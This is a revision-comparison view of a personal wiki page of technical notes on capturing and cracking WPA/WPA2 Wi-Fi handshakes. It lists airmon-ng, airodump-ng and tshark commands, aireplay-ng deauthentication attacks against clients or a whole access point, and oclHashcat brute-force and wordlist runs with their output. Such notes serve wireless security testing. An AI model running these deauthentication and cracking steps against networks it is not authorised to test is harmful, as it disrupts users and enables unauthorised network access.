Ben's notes

Linux, Unix, network, radio...

User Tools

Site Tools


capture_wpa_handshake

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
Last revisionBoth sides next revision
capture_wpa_handshake [2014/06/12 19:50] – [Capture with wifite] admincapture_wpa_handshake [2014/06/14 22:01] admin
Line 101: Line 101:
 [*] anonce: [*] anonce:
     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
-    99 5B 29 78 B5 FF DB 5B 35 CC 2B 53 C0 50 A0 45+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] snonce: [*] snonce:
     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
-    DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96 4E+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] Key MIC: [*] Key MIC:
     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
 [*] eapol: [*] eapol:
     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
-    01 C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 +    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --  
-    AC DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     04 01 00 00 0F AC 02 0C 00     04 01 00 00 0F AC 02 0C 00
  
Line 121: Line 121:
  
 Quitting aircrack-ng...</code> Quitting aircrack-ng...</code>
 +  * Try cracking with olcHashcat. <code>oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1
 +Session.Name...: oclHashcat
 +Status.........: Aborted
 +Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12]
 +Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41)
 +Hash.Type......: WPA/WPA2
 +Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs)
 +Time.Estimated.: > 10 Years
 +Speed.GPU.#1...:   126.6 kH/s
 +Speed.GPU.#2...:   129.0 kH/s
 +Speed.GPU.#3...:   129.2 kH/s
 +Speed.GPU.#4...:   124.4 kH/s
 +Speed.GPU.#5...:   129.1 kH/s
 +Speed.GPU.#6...:   129.0 kH/s
 +Speed.GPU.#*...:   767.2 kH/s
 +Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
 +Progress.......: 94814208/16533293572437839872 (0.00%)
 +Skipped........: 0/94814208 (0.00%)
 +Rejected.......: 0/94814208 (0.00%)
 +HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan
 +HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan
 +HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan
 +HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan
 +HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan
 +HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan
 +
 +Started: Thu Jun 12 22:01:32 2014
 +Stopped: Thu Jun 12 22:03:40 2014</code>
 +  * Or try with wordlist and rules.<code>oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt</code>
 ====Capture with airmon-ng airodump-ng==== ====Capture with airmon-ng airodump-ng====
   * Enable monitor mode on WiFi. <code># airmon-ng start wlan0   * Enable monitor mode on WiFi. <code># airmon-ng start wlan0
Line 138: Line 167:
 wlan0 Intel 6235 iwlwifi - [phy0] wlan0 Intel 6235 iwlwifi - [phy0]
  (monitor mode enabled on mon0)</code>  (monitor mode enabled on mon0)</code>
-  * Find nearest wireless networks. <code># airodump-ng mon0+  * Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>' <code># airodump-ng mon0
  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
  
Line 176: Line 205:
  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>
-  * Dump packets from target channel. <code># airodump-ng --channel 11 --write channel11 mon0</code>+  * Dump packets from target channel. <code># airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0</code>
   * Wait for handshake... or   * Wait for handshake... or
   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>
   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>
   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1